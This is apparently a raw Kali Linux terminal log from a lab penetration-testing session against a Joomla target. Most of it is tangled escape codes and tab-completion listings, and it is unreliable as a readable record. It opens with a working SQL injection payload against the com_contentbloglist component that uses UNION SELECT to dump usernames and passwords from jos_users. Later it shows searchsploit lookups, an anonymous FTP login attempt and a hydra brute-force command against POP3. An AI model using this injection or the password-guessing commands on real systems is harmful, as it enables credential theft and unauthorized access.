!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
------------------------[BEGIN-SNIP{searchword
var}]---------------------------------
------------------------[END-SNIP{searchword
var}]-----------------------------------
[~]>> http://server/index.php?
option=com_contentbloglist&task=listmonth&year=2010&month=1§ion_id=[SQL]&Itemid
=1
[~]>> http://server/index.php?
option=com_contentbloglist&task=listmonth&year=2010&month=1§ion_id=999999+UNION
+ALL+SELECT+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30+from+jos_users&Itemid=1
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m954#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:28:02]#[148D#[?1h#=#[?
2004hs##[1m#[31ms#[0m#[39m##[1m#[31ms#[0m#[39m#[90mearchsploit
com_content#[39m#[23D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[1m#[31ms#[0m#[39m#[90mearchsploit
com_content#[39m#[K#[115C[8:28:02]#[0m#[147D##[1m#[31ms#[1m#[31me#[0m#[39m###[1m#[3
1ms#[1m#[31me#[1m#[31ma#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msea#[0m#[39m#[90mrchsploit
com_content#[39m#[K#[115C[8:28:02]#[0m#[145D##[1m#[31ma#[1m#[31mr#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msear#[0m#[39m#[90mchsploit
com_content#[39m#[K#[115C[8:28:02]#[0m#[144D##[1m#[31mr#[1m#[31mc#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearc#[0m#[39m#[90mhsploit
com_content#[39m#[K#[115C[8:28:02]#[0m#[143D##[1m#[31mc#[1m#[31mh#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearch#[0m#[39m#[90msploit
com_content#[39m#[K#[115C[8:28:02]#[0m#[142D##[1m#[31mh#[1m#[31ms#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchs#[0m#[39m#[90mploit
com_content#[39m#[K#[115C[8:28:02]#[0m#[141D##[1m#[31ms#[1m#[31mp#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchsp#[0m#[39m#[90mloit
com_content#[39m#[K#[115C[8:28:02]#[0m#[140D##[1m#[31mp#[1m#[31ml#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchspl#[0m#[39m#[90moit
com_content#[39m#[K#[115C[8:28:02]#[0m#[139D##[1m#[31ml#[1m#[31mo#[0m#[39m##[1m#[31
mo#[1m#[31mi#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchsploi#[0m#[39m#[90mt
com_content#[39m#[K#[115C[8:28:02]#[0m#[137D##[1m#[31mi#[1m#[31mt#[0m#[39m#[12D#[0m
#[32ms#[0m#[32me#[0m#[32ma#[0m#[32mr#[0m#[32mc#[0m#[32mh#[0m#[32ms#[0m#[32mp#[0m#[3
2ml#[0m#[32mo#[0m#[32mi#[0m#[32mt#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m#[90m
com_content#[39m#[K#[115C[8:28:02]#[0m#[136D##[32mt#[32m #[39m
#[J#[A#[19C###[32mt#[39m#[39m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m
#[90mcom_content#[39m#[K#[115C[8:28:02]#[0m#[135D#[39mc##[4mc#[24m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m
#[4mc#[24m#[90mom_content#[39m#[K#[115C[8:28:02]#[0m#[134D##[4mc#[39m#[4ma#[24m#[39
m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[9D###[24mc#[24ma
#[J#[0;1;2mfile#[0m
#[J#[0mjoomlascan.py#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m ca#[K#[124C[8:28:02]#[0m#[133Dssi
#[J#[A#[29C
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m955#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:29:45]#[148D#[?1h#=#[?
2004hf##[1m#[31mf#[0m#[39m##[1m#[31mf#[0m#[39m#[90mind / -name joomlavs.rb
2>/dev/null#[39m#[35D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m
#[0;1;2mcommand#[0m
#[0mf2py3 fab-cewl factor fadvise faillock
faillog faked-sysv faked-tcp fakeroot
fakeroot-sysv fakeroot-tcp fallocate fantaip faraday
faraday-cli faraday-dispatcher faraday-plugins faraday-server
fastjar fatlabel fbsvcmgr fcat fc-cache fc-cat
fc-conflist fcgistarter fc-match
fc-query fc-validate fdisk fdp fectest fern-
wifi-cracker ffind ffuf fgrep
fidentify fierce fig4latex figlet figlet-figlet figlet-
toilet figlist filan file
FileCheck-14 FileCheck-15 FileCheck-16 filefrag filezilla2john
filterdiff fincore find find-debuginfo
findfs findmnt findrule finger firefox
firefox-esr firewall-cmd firewall-offline-cmd fiwalk
fixparts fixproc flac flashcp flash_erase
flash_eraseall flash_lock flash_otp_dump flash_otp_erase
flash_otp_info flash_otp_lock flash_otp_write flashrom flash_unlock flask
flex flipdiff flock
flowtop fls fmaptool fmt fmtutil
fmtutil-sys fold fonttosfnt fping
free fsck fsck.exfat fsck.ext2 fsck.ext3
fsck.ext4 fsck.fat fsck.minix fsck.msdos
fsck.vfat fsfreeze fstrim ftl_check ftl_format ftp
funzip fuser fusermount
futility futurize fwupdmgr fwupdtool
#[J#[30m#[104m(MORE)#[39m#[49m#[15A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mf#[0m#[39m#[90mind / -name joomlavs.rb
2>/dev/null#[39m#[K#[103C[8:29:45]#[0m#[147D##[1m#[31mf#[1m#[31mt#[0m#[39m#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[34D#[90mp anonymous@10.129.197.143#[39m#[26D
#[J#[0;1;2mcommand#[0m
#[J#[0mftl_check #[Jftl_format #[Jftp #[Jftp-rfc
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mft#[0m#[39m#[90mp
anonymous@10.129.197.143#[39m#[K#[111C[8:29:45]#[0m#[146D###[1m#[31mf#[1m#[31mt#[1m
#[31mp#[0m#[39m####[0m#[32mf#[0m#[32mt#[0m#[32mp#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mftp #[Jftp-rfc#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mftp#[39m#[90m
anonymous@10.129.197.143#[39m#[K#[111C[8:29:45]#[0m#[145D#[39m
#[39ma#[39mn#[39mo#[39mn#[39my#[39mm#[39mo#[39mu#[39ms#[39m@#[39m1#[39m0#[39m.#[39m
1#[39m2#[39m9#[39m.#[39m1#[39m9#[39m7#[39m.#[39m1#[39m4#[39m3
#[J#[A#[34C
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m957#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:49:37]#[148D#[?1h#=#[?
2004hs##[1m#[31ms#[0m#[39m##[1m#[31ms#[0m#[39m#[90mearchsploit
cassiopeia#[39m#[22D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[1m#[31ms#[0m#[39m#[90mearchsploit
cassiopeia#[39m#[K#[116C[8:49:37]#[0m#[147D##[1m#[31ms#[1m#[31mu#[0m#[39m#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[21D###[0m#[32ms#[0m#[32mu#[39m#[90mdo
python2.7 -m pip install urllib3#[39m#[35D
#[J#[0;1;2mcommand#[0m
#[J#[0msu #[Jsudo #[Jsudo-command-line #[Jsudoedit #[Jsudo_logsrvd
#[Jsudoreplay #[Jsudo_sendlog #[Jsulogin #[Jsum #[Jsumtool #[Jsunrpcfuzz
#[Jsuperiotool #[Jsuspend #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msu#[39m#[90mdo python2.7 -m pip install
urllib3#[39m#[K#[102C[8:49:37]#[0m#[146D###[32ms#[32mu#[32md#[39m####[1m#[31ms#[1m#
[31mu#[1m#[31md#[0m#[39m##[1m#[31md#[1m#[31mo#[0m#[39m#####[0m#[4m#[32ms#[0m#[4m#[3
2mu#[0m#[4m#[32md#[0m#[4m#[32mo#[24m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msudo #[Jsudo-command-line #[Jsudoedit
#[Jsudo_logsrvd #[Jsudoreplay #[Jsudo_sendlog
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m#[90m python2.7 -m pip install
urllib3#[39m#[K#[102C[8:49:37]#[0m#[144D##[4m#[32mo#[4m#[32m #[24m#[39m
#[J#[A#[11C###[4m#[32mo#[24m#[39m#[24m#[39m
#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mexternal command#[0m
#[0mairmon-ng ant atk6-fake_router26 cd-fix-
profile chromeos-tpm-recovery cluster comm
ebtables-save find-debuginfo fsck.vfat gcc-nm
gpic gxl2dot htmove
impacket-keylistattack impacket-sniff kismet kwalletmanager5
mcafee_epo2john nfsstat oLschema2ldif
orca pfc phar8.2 pipal
pw-mididump r2pm redsocks
sed see seq smbd
snmpgetnext tsk_loaddb uclampset
unshare urlscan valgrind-listener vcstime
x86_64-linux-gnu-ld xfwm4 x-window-manager
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[90mpython2.7 -m pip install
urllib3#[39m#[K#[102C[8:49:37]#[0m#[143D#[39ma#[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[31D##[1m#[31ma#[0m#[39m#[90mpt-get install --yes
ruby#[39m#[25D##[1m#[31ma#[1m#[31mp#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[0mapache2 apache2ctl apachectl apex2john apparmor_parser
apparmor_status applenotes2john applygnupgdefaults appres
appstreamcli apropos apt apt-add-repository apt-cache
apt-cdrom apt-config apt-extracttemplates apt-file
#[Japt-ftparchive #[Japt-get #[Japt-key #[Japt-mark #[Japt-
sortpkgs #[Japython #[J
#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31map#[0m#[39m#[90mt-get install --yes
ruby#[39m#[K#[108C[8:49:37]#[0m#[141D##[1m#[31mp#[1m#[31mt#[0m#[39m####[0m#[32ma#[0
m#[32mp#[0m#[32mt#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt #[Japt-add-repository #[Japt-cache #[Japt-cdrom #[Japt-config
#[Japt-extracttemplates #[Japt-file #[Japt-ftparchive #[Japt-get #[Japt-key
#[Japt-mark #[Japt-sortpkgs #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mapt#[39m#[90m-get install --yes
ruby#[39m#[K#[108C[8:49:37]#[0m#[140D##[32mt#[32m-
#[39m#####[1m#[31ma#[1m#[31mp#[1m#[31mt#[1m#[31m-#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt-add-repository #[Japt-cache #[Japt-cdrom #[Japt-config #[Japt-
extracttemplates #[Japt-file #[Japt-ftparchive #[Japt-get #[Japt-key #[Japt-
mark #[Japt-sortpkgs #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mapt-#[0m#[39m#[90mget install --yes
ruby#[39m#[K#[108C[8:49:37]#[0m#[139D##[1m#[31m-#[1m#[31mg#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt-get#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mapt-g#[0m#[39m#[90met install --yes
ruby#[39m#[K#[108C[8:49:37]#[0m#[138D##[1m#[31mg#[1m#[31me#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt-get#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mapt-ge#[0m#[39m#[90mt install --yes
ruby#[39m#[K#[108C[8:49:37]#[0m#[137D##[1m#[31me#[1m#[31mt#[0m#[39m########[0m#[32m
a#[0m#[32mp#[0m#[32mt#[0m#[32m-#[0m#[32mg#[0m#[32me#[0m#[32mt#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt-get#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mapt-get#[39m#[90m install --yes
ruby#[39m#[K#[108C[8:49:37]#[0m#[136D#[39m
#[39mi#[39mn#[39ms#[39mt#[39ma#[39ml#[39ml#[39m #[39m-#[39m-#[39my#[39me#[39ms#[39m
#[39mr#[39mu#[39mb#[39my#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#
[49m
#[J#[0;1;2mpackage#[0m
#[0mruby-aggregate ruby-ast ruby-atk
ruby-aws ruby-beautify
ruby-bio ruby-cat ruby-ddmemoize ruby-
email-validator ruby-gdk-pixbuf2
ruby-google-apis-cloudbilling-v1 ruby-jmespath ruby-js-regex ruby-
lru-redux ruby-lumberjack
ruby-mustache ruby-premailer-rails ruby-rack-ssl ruby-
rails-assets-jquery-fullscreen-plugin ruby-redis-actionpack
ruby-redis-rack ruby-ruby2-keywords ruby-saml ruby-
sasl ruby-sass
ruby-shindo ruby-stringify-hash ruby-view-component
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mapt-get#[39m install --yes
ruby#[K#[108C[8:49:37]#[0m#[117D#### #####[90mruby#[39m####
#[J#[0;1;2mpackage#[0m
#[J#[0mfile #[Jfilecheck #[Jfile-kanji #[Jfilelight #[Jfile-roller
#[Jfilespooler #[Jfiletea #[Jfiletraq #[Jfilezilla #[Jfilezilla-common
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mapt-get#[39m install --yes
file#[K#[108C[8:49:37]#[0m#[117Dzi#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mpackage#[0m
#[0mfilezilla filezilla-common
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mfilezilla#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mapt-get#[39m install --yes
filezi#[K#[106C[8:49:37]#[0m#[115Dlla#[?1l#>#[?2004l
#[J#[A#[42C
The following packages were automatically installed and are no longer required:
debtags kali-debtags libhiredis0.14
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
filezilla-common libfilezilla-common libfilezilla42 libpcre2-16-0 libpcre2-32-0
libpcre2-8-0 libpugixml1v5 libwxbase3.2-1 libwxgtk3.2-1
The following NEW packages will be installed:
filezilla filezilla-common libfilezilla-common libfilezilla42 libpcre2-32-0
libpugixml1v5 libwxbase3.2-1 libwxgtk3.2-1
The following packages will be upgraded:
libpcre2-16-0 libpcre2-8-0
2 upgraded, 8 newly installed, 0 to remove and 1586 not upgraded.
Need to get 11.2 MB of archives.
After this operation, 43.4 MB of additional disk space will be used.
0% [Working]
0% [Working]
0% [Waiting for headers] [Waiting for headers]
79% [Working]
100% [Working]
Restarting services...
#[?1049h#[22;0;0t#[1;79r#[4l#[?25l#(B#[m#[37m#[40m#[1;79r#[H#[2J#[1;1H#[97m#[44m#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K
#[K#[1;1H#[37mPackage configuration#[28;55H#[30m#[47m┌────┤ #[31mDaemons using
outdated libraries#[30m ├─────┐#[29;55H│
│#[97m#[40m #[30;55H#[30m#[47m│
│#[97m#[40m #[31;55H#[30m#[47m│ Which services should be restarted?
│#[97m#[40m #[32;55H#[30m#[47m│
│#[97m#[40m #[33;55H#[30m#[47m│ #[37m#[44m[#[41m*#[44m] accounts-daemon.service
#[30m#[47m │#[97m#[40m #[34;55H#[30m#[47m│ #[37m#[44m[*] cron.service
#[30m#[47m │#[97m#[40m #[35;55H#[30m#[47m│ #[37m#[44m[ ] dbus.service
#[30m#[47m │#[97m#[40m #[36;55H#[30m#[47m│ #[37m#[44m[ ]
docker.service #[30m#[47m │#[97m#[40m #[37;55H#[30m#[47m│
#[37m#[44m[ ] ModemManager.service #[30m#[47m │#[97m#[40m
#[38;55H#[30m#[47m│ #[37m#[44m[ ] NetworkManager.service #[30m#[47m
│#[97m#[40m #[39;55H#[30m#[47m│ #[37m#[44m[*] open-vm-tools.service #[30m#[47m
│#[97m#[40m #[40;55H#[30m#[47m│ #[37m#[44m[*] polkit.service #[30m#[47m
│#[97m#[40m #[41;55H#[30m#[47m│ #[37m#[44m[ ] sddm.service #[30m#[47m
│#[97m#[40m #[42;55H#[30m#[47m│ #[37m#[44m[*] systemd-journald.service #[30m#[47m
│#[97m#[40m #[43;55H#[30m#[47m│ #[37m#[44m[ ] systemd-logind.service #[30m#[47m
│#[97m#[40m #[44;55H#[30m#[47m│ #[37m#[44m[*] systemd-manager #[30m#[47m
│#[97m#[40m #[45;55H#[30m#[47m│ #[37m#[44m[*] systemd-udevd.service #[30m#[47m
│#[97m#[40m #[46;55H#[30m#[47m│ #[37m#[44m[*] udisks2.service #[30m#[47m
│#[97m#[40m #[47;55H#[30m#[47m│ #[37m#[44m[*] upower.service #[30m#[47m
│#[97m#[40m #[48;55H#[30m#[47m│
│#[97m#[40m #[49;55H#[30m#[47m│
│#[97m#[40m #[50;55H#[30m#[47m│ <Ok> <Cancel>
│#[97m#[40m #[51;55H#[30m#[47m│
│#[97m#[40m
#[52;55H#[30m#[47m└─────────────────────────────────────────────┘#[97m#[40m
#[53;56H
#[33;62H#[33;59H#[37m#[44m*#[50;66H#[41m<Ok>#[50;67H#[?12l#[?
25h#[79;1H#[40m#(B#[m#[39;49m
#[K
#[?1049l#[23;0;0t /etc/needrestart/restart.d/systemd-manager
systemctl restart accounts-daemon.service cron.service open-vm-tools.service
polkit.service systemd-journald.service systemd-udevd.service udisks2.service
upower.service
Service restarts being deferred:
systemctl restart ModemManager.service
systemctl restart NetworkManager.service
/etc/needrestart/restart.d/dbus.service
systemctl restart docker.service
systemctl restart sddm.service
systemctl restart systemd-logind.service
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m958#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:50:25]#[148D#[?1h#=#[?
2004hh#hydra -V -f -l <username>@<domain_name> -P <wordlist>
pop3://<IP>#[65D#[7mh#[7my#[7md#[7mr#[7ma#[7m #[7m-#[7mV#[7m #[7m-#[7mf#[7m #[7m-
#[7ml#[7m
#[7m<#[7mu#[7ms#[7me#[7mr#[7mn#[7ma#[7mm#[7me#[7m>#[7m@#[7m<#[7md#[7mo#[7mm#[7ma#[7
mi#[7mn#[7m_#[7mn#[7ma#[7mm#[7me#[7m>#[7m #[7m-#[7mP#[7m
#[7m<#[7mw#[7mo#[7mr#[7md#[7ml#[7mi#[7ms#[7mt#[7m>#[7m
#[7mp#[7mo#[7mp#[7m3#[7m:#[7m/#[7m/#[7m<#[7mI#[7mP#[7m>#[27m#[65D#[27mh#[27my#[27md
#[27mr#[27ma#[27m #[27m-#[27mV#[27m #[27m-#[27mf#[27m #[27m-#[27ml#[27m
#[27m<#[27mu#[27ms#[27me#[27mr#[27mn#[27ma#[27mm#[27me#[27m>#[27m@#[27m<#[27md#[27m
o#[27mm#[27ma#[27mi#[27mn#[27m_#[27mn#[27ma#[27mm#[27me#[27m>#[27m #[27m-
#[27mP#[27m #[27m<#[27mw#[27mo#[27mr#[27md#[27ml#[27mi#[27ms#[27mt#[27m>#[27m
#[27mp#[27mo#[27mp#[27m3#[27m:#[27m/#[27m/#[27m<#[27mI#[27mP#[27m>#[65D#[32mh#[32my
#[32md#[32mr#[32ma#[39m#[10C#[33m<#[39m#[8C#[33m>#[39m@#[33m<#[39m#[11C#[33m>#[39m#
[4C#[33m<#[39m#[8C#[33m>#[39m#[8C#[33m<#[39m#[2C#[33m>#[39m#[65D
#[0;1;2mcommand#[0m
#[J#[0mhydra #[Jhydra-wizard#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l
#[33m<#[39musername#[33m>#[39m@#[33m<#[39mdomain_name#[33m>#[39m -P
#[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[74C[8:50:25]#[0m#[148D#[7C#[3C#[3C#[3C#[11C#[7C
#[7C
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l #[33m<#[39musername#[33m>#[39m@#[33m<#[39m -P
#[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[86C[8:50:25]#[0m#[121D#[11D -P
#[33m<#[39mwor#[39mdl#[39mist#[33m>#[39m #[39mpop3://#[33m<#[39mI#[39mP#[33m>#[39m
#[39m #[39m #[37D
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l #[33m<#[39m -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[97C[8:50:25]#[0m#[132D##[39m -P
#[33m<#[39m#[39mwordlist#[33m>#[39m#[39m pop3://#[33m<#[39m#[39mIP#[33m>#[39m#[39m
#[27D
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[98C[8:50:25]#[0m#[133Dt -P#[39m
#[33m<#[39mwordlis#[39mt#[33m>#[39m pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26D
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l t -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[97C[8:50:25]#[0m#[132Dr -P#[39m
#[33m<#[39mwordlis#[39mt#[33m>#[39m pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26Di
-P#[39m #[33m<#[39mwordlis#[39mt#[33m>#[39m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26Dl -P#[39m
#[33m<#[39mwordlis#[39mt#[33m>#[39m pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26Do
-P#[39m #[33m<#[39mwordlis#[39mt#[33m>#[39m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26D
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l t -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[97C[8:50:25]#[0m#[132D# -P
